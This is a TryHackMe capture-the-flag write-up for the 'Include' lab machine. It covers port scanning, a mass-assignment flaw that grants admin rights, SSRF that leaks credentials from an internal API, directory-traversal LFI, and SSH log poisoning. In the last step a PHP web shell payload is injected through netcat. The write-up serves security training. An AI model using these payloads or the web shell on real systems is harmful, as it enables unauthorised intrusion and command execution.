📁Include

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

LogoTryHackMe | Cyber Security TrainingTryHackMe
Machine version: includev1.33

Use your server exploitation skills to take control of a web app.

Created by tryhackme, 1337rce, and l000g1c

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- include.thm             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 07:10 EEST
Stats: 0:08:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 66.93% done; ETC: 07:22 (0:04:09 remaining)
Stats: 0:10:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 81.70% done; ETC: 07:22 (0:02:19 remaining)
Nmap scan report for include.thm (10.10.122.153)
Host is up (0.11s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
110/tcp   open  pop3
143/tcp   open  imap
993/tcp   open  imaps
995/tcp   open  pop3s
4000/tcp  open  remoteanything
50000/tcp open  ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 764.84 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,25,110,143,993,995,4000,50000 include.thm
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 07:32 EEST
Nmap scan report for include.thm (10.10.122.153)
Host is up (0.11s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 64:63:1d:47:82:6d:db:ce:89:f6:8c:b6:a8:90:87:1a (RSA)
|   256 80:f6:68:89:c8:fa:8b:0b:96:62:b7:e0:77:6e:88:9b (ECDSA)
|_  256 4d:25:d1:05:06:83:69:6b:07:00:fc:c6:a0:cc:0c:69 (ED25519)
25/tcp    open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_smtp-commands: mail.filepath.lab, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: CAPA SASL AUTH-RESP-CODE PIPELINING RESP-CODES STLS TOP UIDL
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_ssl-date: TLS randomness does not represent time
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_imap-capabilities: SASL-IR more have post-login listed LOGINDISABLEDA0001 capabilities OK STARTTLS ENABLE LOGIN-REFERRALS ID IDLE Pre-login IMAP4rev1 LITERAL+
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_imap-capabilities: SASL-IR more AUTH=LOGINA0001 have AUTH=PLAIN post-login capabilities OK IDLE ENABLE listed LOGIN-REFERRALS ID Pre-login IMAP4rev1 LITERAL+
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN LOGIN) AUTH-RESP-CODE PIPELINING RESP-CODES USER TOP UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
4000/tcp  open  http     Node.js (Express middleware)
|_http-title: Sign In
50000/tcp open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: System Monitoring Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host:  mail.filepath.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.16 seconds

1z - What we know so far

  • No easy wins (critical CVE exploits or other)

  • We have 2 HTTP servers, SSH enabled and multiple ports for email

2 - Review App

2a - Exploring

Landing page. We do as it is written and login using guest guest
Dashboard after login
View Profile

2b - Mass assignment

Submitting test1 and test2 adds it directly to our profile properties
Overwrote isAdmin property with something different than false.By doing so, we exploited a mass assignment vulnerability. We now have access to new admin-only sections of the website
API documentation shows a server is bound to 127.0.0.1:5000. It means the server is not publicly exposed. We need a way to do an SSRF and get the results

2c - SSRF

Settings page. It seems we can let the server make requests on our behalf.
After submitting http://127.0.0.1:5000/getAllAdmins101099991 as Banner Image URL, we get this output in base64
Decoding the output
┌──(kali㉿kali)-[~]
└─$ echo "eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2a--SNIP--" | base64 -d
{"ReviewAppUsername":"REDACTED_BY_ME","ReviewAppPassword":"REDACTED_BY_ME","SysMonAppUsername":"REDACTED_BY_ME","SysMonAppPassword":"REDACTED_BY_ME"}

2z - What we know so far

We now have credentials to the ReviewApp (port 4000) and the SysMonApp (port 50000. We know that by simply visiting port 50000).

3 - SysMonApp

3a - Exploring and first flag

Landing page of port 50000
Using the credentials retrieved from the private server on port 5000
First flag!

3b - LFI

Looking at the source code of the dashboard, the only interesting component is the profile picture's URL: http://include.thm:50000/profile.php?img=profile.png

It seems PHP is including the PNG file (aka rendering it). That is why the rendering is terrible

It looks like the web app is using the parameter img to access a specified file on the filesystem. Maybe it is vulnerable to a directory traversal.

To test this potential attack vector, we intercept a normal request to the profile picture using Burp:

Make sure you are logged in to port 50000 before intercepting the request. Trying to send requests without proper cookies will always redirect you to the login page

For the payload, we will use the one built into Burp:

Voila! Sorting by length, we notice that one of the attempts successfully returned the /etc/hosts file. This is amazing!

Now that we uncovered the proper way to exploit the directory traversal vulnerability, we need to find a way to access the mysterious flag file located in /var/www/html (as specified in the room on TryHackMe). If we knew the filename, it was probably game over. But we don't. We need to find a way to ls into /var/www/html.

3c - Looking for a log file to poison

This is the request that successfully returned the contents of /etc/hosts.
We will send requests to retrieve well-known files on Debian.
Suprisingly, there was no log file for Apache. Luckily, there is one for SSH! (shown above)

3d - Log Poisoning

3di - Testing that it works

┌──(kali㉿kali)-[~]
└─$ nc include.thm 22
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
<?php echo phpinfo(); ?>
Invalid SSH identification string.

3dii - Sending the payload

The below payload was retrieved from https://revshells.com/

┌──(kali㉿kali)-[~]
└─$ nc include.thm 22
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
Invalid SSH identification string.
Executing ls in /var/www/html. We found the filename!
Final Flag 🎉
PreviousExposeNextLookup

Last updated

Was this helpful?